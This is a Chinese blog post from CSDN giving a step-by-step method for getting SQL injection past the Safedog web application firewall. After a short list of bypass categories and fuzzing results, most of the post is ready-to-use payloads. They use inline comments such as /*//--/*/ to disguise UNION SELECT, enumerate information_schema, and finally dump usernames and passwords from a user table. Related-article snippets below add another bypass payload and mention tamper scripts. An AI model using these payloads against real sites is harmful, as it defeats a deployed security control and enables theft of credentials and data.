过最新版安全狗SQL注入

已于 2022-03-16 23:58:14 修改
阅读量2.5k 收藏 16
点赞数 3
分类专栏: 网络安全 渗透测试 SQL注入 文章标签: web安全 sql 渗透测试 php
于 2022-03-07 18:02:04 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/song123sh/article/details/123336028
版权
渗透测试 同时被 3 个专栏收录
55 篇文章 11 订阅
订阅专栏
网络安全
46 篇文章 24 订阅
订阅专栏
SQL注入
22 篇文章 1 订阅
订阅专栏

文章目录

1、主站漏洞绕狗方法分类

  • 使用特殊字符(ASCII码不在32-127范围内)
  • 使用特殊语法(非常规的SQL注入语句)
  • 使用超长数据(超长的数据安全狗无法处理)
  • 利用安全狗的白名单策略(借助安全狗的白名单逆袭)
  • 利用操作系统特性(利用费安全狗防护策略的特性完成逆袭)
  • 其他的一些手段或是以上方法的结合(一些其他技巧)

image-20220307134646281

安全狗的规则库可直接在软件中查看

2、Fuzz测试

?id=1'不拦截单引号,但是会转义

?id=1 and 1拦截and

?id=1 order by拦截order by

?id=1 union正常

?id=1 select正常

?id=1 union select拦截

构造:?id=1 union

3、内联注释order by

内联注释/*!*/不加叹号就是注释,加上叹号会执行后面的语句

空格可以用加号代替

&0a是换行

image-20220307144912846

?id=1 order /*//--/*/ by 5

?id=1 order /*//*//*//*/ by 5

4、联合查询

?id=1 union /*//--/*/ select 1,2,3,4,5

?id=1 union /*//*//*//*/ select 1,2,3,4,5

image-20220307172054120

5、爆库

database()关键字

?id=1 union /*//--/*/ select 1,2,database/*//--/*/(),4,5

image-20220307172134307

6、获取其他数据库

?id=1 union /*//--/*/ select 1,2,group_concat(schema_name),4,5 /*//--/*/ from /*!--+/*%0ainformation_schema./*!SCHEMATA*/

image-20220307172151020

7、获取所有表

?id=1 union /*//--/*/ select 1,2,group_concat(table_name),4,5 /*//--/*/ from /*!--+/*%0ainformation_schema./*!tables*/ where table_schema=0x6861636B796C

image-20220307172208406

8、获取所有列

?id=1 union /*//--/*/ select 1,2,group_concat(column_name),4,5 /*//--/*/ from /*!--+/*%0ainformation_schema./*!columns*/ where table_name=0x75736572

image-20220307172341469

9、获取所有数据

?id=1 union /*//--/*/ select 1,group_concat(username),group_concat(password),4,5 /*//--/*/ from user

Shadow丶S
关注
  • 3
    点赞
  • 16
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 2
    评论
专栏目录
SQL注入绕过安全狗
blackguest07的博客
01-12 2221
SQL注入绕过安全狗,内容很详细,本文仅供学习,请勿做一些非法事情,出事与博主无关。
SQL注入-绕过安全狗
LJH1999ZN的博客
02-15 4984
绕过安全狗的常见四种方式 id=1'/*!44444order*/ /*!44444by*/3--+
2024年网安最全WAF相关知识及安全狗的部署和绕过_安全狗waf拦截规则
最新发布
2401_84265571的博客
05-01 986
且云WAF的维护成本低,不需要部署任何硬件设备,云WAF的拦截规则会实时更新。对于部署了云WAF的网站,我们发出的数据请求首先会经过云WAF节点进行规则检测,如果请求匹配到WAF拦截规则,则会被WAF进行拦截处理,对于正常、安全的请求则转发到真实Web服务器中进行响应处理。若在安装过程中,出现如下两个页面:页面1中提示“服务器上没有Apache服务”,页面2中服务名为空(一般情况下,Apache服务开启,安全狗程序会自动读取服务名),则表示Apache的系统服务未开启,需要先开启Apache的系统服务。
【WAF剖析】——SQL注入安全狗bypass深度剖析
Demo不是emo的博客
11-23 6792
sql注入不会绕过WAF?关注我,让我带你由简入难实战各个WAF,今天先来看看web安全渗透必会的安全狗WAF,你会绕吗?看我带你将它拿下
绕过安全狗SQL注入
baynk的博客
08-06 3355
搞了几天CTF的注入后,熟悉了一些姿势,来尝试对安全狗进行绕过,发现出人意料的简单,主要是用来记录下当前安全的绕过方式,反正过一段时间可能就不能用了。。。不做任何解释,仅做记录,原理基本上在之前的博客中都有写 实验环境 windows server 2008 phpstudy 安全狗V4.0.2395 实验前准备 开启phpstudy,这次和之前有点区别,由于要安装安全狗,所以在开启phpst...
绕过安全狗继续注入的思路
08-30
绕过安全狗继续注入的思路。
超级SQL注入工具【SSQLInjection】V1.0 正式版 20200527.rar
04-10
超级SQL注入工具【SSQLInjection】V1.0 正式版 20200527
SQL手工注入教程最新版
09-18
sql注入教程,经典哦!想学注入的要看,想学防注入的更要看
超级SQL注入工具【SSQLInjection】V1.0 正式版 20201112
09-22
超级SQL注入工具最新版
SQL注入漏洞讲解
02-02
讲解SQL注入漏洞原理以及测试方法;目前,最新的DVWA已经更新到1.9版本(http://www.dvwa.co.uk/),而网上的教程大多停留在旧版本,且没有针对DVWA high级别的教程,因此萌发了一个撰写新手教程的想法,错误的地方还...
SQL注入攻击与防御
06-22
SQL注入攻击是一种已经长期存在,但近年来日益增长的安全威胁,克拉克所著的《SQL注入攻击与防御(第2版)》致力于深入探讨SQL注入问题。《SQL注入攻击与防御(第2版)》前一版荣获2009Bejtlich最佳图书奖,第2版对内容...
防止xss和sql注入:JS特殊字符过滤正则
10-27
防止xss和sql注入:JS特殊字符过滤正则,需要的朋友可以参考一下
bypasswaf:关于安全狗和云锁的自动化绕过脚本
03-20
旁通 为避免非法用途而进行的学习 2.0:增加优化了部分规则现在bypass云锁篡改及bypass安全狗篡改支持所有的注入类型了!更新了bypass安全狗任意文件上传的方法(适用于业务系统存在的任何文件上传碎片但服务器安装了安全狗环境)更新了bypass安全狗SQL注入篡改,现在支持所有类型的注入了 针对最新版云锁和安全狗sqlmap自动化绕过脚本 包含:绕过安全狗sql注入篡改绕过云锁SQL注入篡改(可0警告绕过云锁)理论上来说规则越多速度也会越慢所以不追求隐蔽性的可以按需求修改规则 针对最新版安全狗的任意文件上传bypass safedog_upload_yichu.txt safedog_upload_huanhang.txt 利用知识点: 安全狗:内联注释博客: : 云锁:引号包裹注释符绕过检测博客: : 云锁:多行注释符嵌入#绕过检测博客: : 文件上传:Conten
SQL注入-安全狗apache最新版绕过
crowsec
01-26 1563
微信公众号:乌鸦安全 扫取二维码获取更多信息! 01背景知识 现在的环境下对web选手越来越不友好,如果想在web场景中去挖洞,基本上都要面对waf,而常用的waf产品有很多,本次以开源免费最新版安全狗为例,绕过waf获取数据。 tips:本文需要您提前掌握一定的基础知识! 02环境配置 Windows10主机 phpstudy2018 sqli-labs靶场 安全狗apache4.0.30255 当前版本是最新版安全狗(截止2021.05.17) ...
mssql基础(三)——mssql注入+简单绕过注入+bypass安全狗
7Riven's blog
11-07 3293
1.注入类型 布尔盲注:http://192.168.232.174/Test.aspx?id=1and ascii(substring((select top 1 name from master..sysdatabases),1,1))>100 验证如下: 时间盲注:http://192.168.232.174/test.aspx?id=1;if (ascii(substr...
BypassWAF安全狗以及手工注入大全
Grey的博客
03-24 2097
过狗姿势①HPP参数污染使用多个无用的值或者重复的值打到攻击效果②双文件上传1.txt1.php覆盖前个文件SQL手工注入大全都知道'报错是手工注入的一种方法,但是为什么要手工注入呢?因为让第一条数据报错,就可以执行第二条语句联合注入法查询表名查询列名正则匹配查询布尔值注入主要是and的问题‘1’=‘1’的话,会返回一个正常的页面如果user()=本地用户的时候,结果如下如下显示失败count用法...
绕最新版安全狗-附上sqlmap的tamper
aiguang4476的博客
07-08 906
在t00ls 里面我发的,放博客分享 记录一下 小菜写文章,太菜 希望大佬放过我!主要分享一下,绕狗的思路环境:windows7 + phpstudy + safedog v4.0+ Mysql 5.2cms: sql-labsMysql 注释符:#-- /**/0x01:注入点:http://192.168.89.132/Sql/Less-1/?id=1先从 ...
SQL注入 安全狗apache4.0.26655绕过
crowsec
01-26 1867
微信公众号:乌鸦安全 扫取二维码获取更多信息! 说明 本次靶场采用经典的sqli-labs搭建,waf使用的是安全狗的apache4.0.26655版本,文章从最开始的分析到最后的结果,中间难免会有错误的地方,希望大家多多包涵和理解。 上次我们发了一篇SQL注入-安全狗超大数据包绕过的文章,使用的是安全狗apache3.5.12048版本,这次是4.0系列的版本,全手动注入,后续会带来这方面的视频课程和相关tamper的编写。 因为文章中的靶场搭载了公网上,所以对以前的笔记进行了打码。..
内网渗透PTH(pass-the-hash)
https://www.cnblogs.com/zpchcbd/
09-11 1654
pass-the-hash在内网渗透中是一种很经典的攻击方式,原理就是攻击者可以直接通过LM Hash和NTLM Hash访问远程主机或服务,而不用提供明文密码。 pass the hash原理: 在Windows系统中,通常会使用NTLM身份认证,NTLM认证不使用明文口令,而是使用口令加密后的hash值,hash值由系统API生成(例如LsaLogonUser) ,其中hash(哈希)分为...
安全狗sql联合查询
08-25
如果你的问题是如何使用安全狗来防止SQL注入攻击中的联合查询攻击,以下是一些常见的建议: 1. 输入验证和过滤:对于用户输入的数据,进行严格的验证和过滤,确保输入的数据符合预期的格式和类型。这可以防止恶意...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

Shadow丶S

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值